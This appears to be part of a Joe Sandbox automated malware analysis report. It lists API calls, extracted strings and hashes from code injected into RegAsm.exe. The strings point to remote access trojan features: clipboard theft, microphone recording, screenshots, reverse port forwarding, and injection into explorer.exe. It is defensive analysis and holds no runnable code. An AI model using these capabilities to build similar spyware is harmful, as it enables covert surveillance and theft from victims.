                                                                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                        APIs
                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                        • __freea.LIBCMT ref: 00454003
                                                                        • __freea.LIBCMT ref: 0045400F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                        • String ID: \@E
                                                                        • API String ID: 201697637-1814623452
                                                                        • Opcode ID: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
                                                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                        • Opcode Fuzzy Hash: fb6195c260b9ae5d4324619eca1f95c452dc13a98459a94436f4153b7f964d62
                                                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: \&G$\&G$`&G
                                                                        • API String ID: 269201875-253610517
                                                                        • Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                        • Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
                                                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 65535$udp
                                                                        • API String ID: 0-1267037602
                                                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                        • __dosmaperr.LIBCMT ref: 0043A937
                                                                        • _free.LIBCMT ref: 0043A943
                                                                        • _free.LIBCMT ref: 0043A94A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                        • String ID:
                                                                        • API String ID: 2441525078-0
                                                                        • Opcode ID: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                                                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                        • Opcode Fuzzy Hash: dbaba6b5bf7e8e3101b206719032b6e5feaa877e1e5831e4faa096a05e69cc69
                                                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                        • String ID: @5U$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                        • API String ID: 489098229-4168590520
                                                                        • Opcode ID: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                        • Opcode Fuzzy Hash: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
                                                                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                        APIs
                                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                        • GetMessageA.USER32 ref: 0040556F
                                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                                        • DispatchMessageA.USER32 ref: 00405589
                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                        • API String ID: 2956720200-749203953
                                                                        • Opcode ID: 5ea030363712ba77842d536cdbf33def2348f5e0d7544d4704eea9ef4d92fc10
                                                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                        • Opcode Fuzzy Hash: 5ea030363712ba77842d536cdbf33def2348f5e0d7544d4704eea9ef4d92fc10
                                                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                        APIs
                                                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                        • String ID: 0VG$0VG$<$@$Temp
                                                                        • API String ID: 1704390241-2575729100
                                                                        • Opcode ID: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                        • Opcode Fuzzy Hash: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                        APIs
                                                                        • OpenClipboard.USER32 ref: 00416941
                                                                        • EmptyClipboard.USER32 ref: 0041694F
                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                        • GetClipboardData.USER32 ref: 0041696C
                                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                        • String ID: !D@
                                                                        • API String ID: 2172192267-604454484
                                                                        • Opcode ID: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                        • Opcode Fuzzy Hash: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                        APIs
                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                        • String ID:
                                                                        • API String ID: 221034970-0
                                                                        • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                        • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                        APIs
                                                                        • _free.LIBCMT ref: 00448135
                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                        • _free.LIBCMT ref: 00448141
                                                                        • _free.LIBCMT ref: 0044814C
                                                                        • _free.LIBCMT ref: 00448157
                                                                        • _free.LIBCMT ref: 00448162
                                                                        • _free.LIBCMT ref: 0044816D
                                                                        • _free.LIBCMT ref: 00448178
                                                                        • _free.LIBCMT ref: 00448183
                                                                        • _free.LIBCMT ref: 0044818E
                                                                        • _free.LIBCMT ref: 0044819C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                        APIs
                                                                        • _free.LIBCMT ref: 100059EA
                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                        • _free.LIBCMT ref: 100059F6
                                                                        • _free.LIBCMT ref: 10005A01
                                                                        • _free.LIBCMT ref: 10005A0C
                                                                        • _free.LIBCMT ref: 10005A17
                                                                        • _free.LIBCMT ref: 10005A22
                                                                        • _free.LIBCMT ref: 10005A2D
                                                                        • _free.LIBCMT ref: 10005A38
                                                                        • _free.LIBCMT ref: 10005A43
                                                                        • _free.LIBCMT ref: 10005A51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                        • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                        • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                        • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Eventinet_ntoa
                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                        • API String ID: 3578746661-3604713145
                                                                        • Opcode ID: 114ca9f643dc2f4d7546a21062c8a27b75c5acd813e7d1c74f06d86295f380ed
                                                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                        • Opcode Fuzzy Hash: 114ca9f643dc2f4d7546a21062c8a27b75c5acd813e7d1c74f06d86295f380ed
                                                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                        APIs
                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DecodePointer
                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                        • API String ID: 3527080286-3064271455
                                                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                        • API String ID: 1462127192-2001430897
                                                                        • Opcode ID: 45d511ba9bf817b3096931c966ebdfdf96c97f09e97a3e6770c335837830b84d
                                                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                        • Opcode Fuzzy Hash: 45d511ba9bf817b3096931c966ebdfdf96c97f09e97a3e6770c335837830b84d
                                                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentProcess
                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                        • API String ID: 2050909247-4242073005
                                                                        • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                        • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                        APIs
                                                                        • _strftime.LIBCMT ref: 00401D50
                                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                        • API String ID: 3809562944-243156785
                                                                        • Opcode ID: 4f9b9045cb0b019b2334cf4f72d0ee825d7ac7ef05b05af99fd66716d43047c4
                                                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                        • Opcode Fuzzy Hash: 4f9b9045cb0b019b2334cf4f72d0ee825d7ac7ef05b05af99fd66716d43047c4
                                                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                        • int.LIBCPMT ref: 00410E81
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                        • String ID: ,kG$0kG
                                                                        • API String ID: 3815856325-2015055088
                                                                        • Opcode ID: dd30fbcc444118b08f019d0663a80713b7f65785f937330be09992796588b1c6
                                                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                        • Opcode Fuzzy Hash: dd30fbcc444118b08f019d0663a80713b7f65785f937330be09992796588b1c6
                                                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                        • waveInStart.WINMM ref: 00401CFE
                                                                        Strings
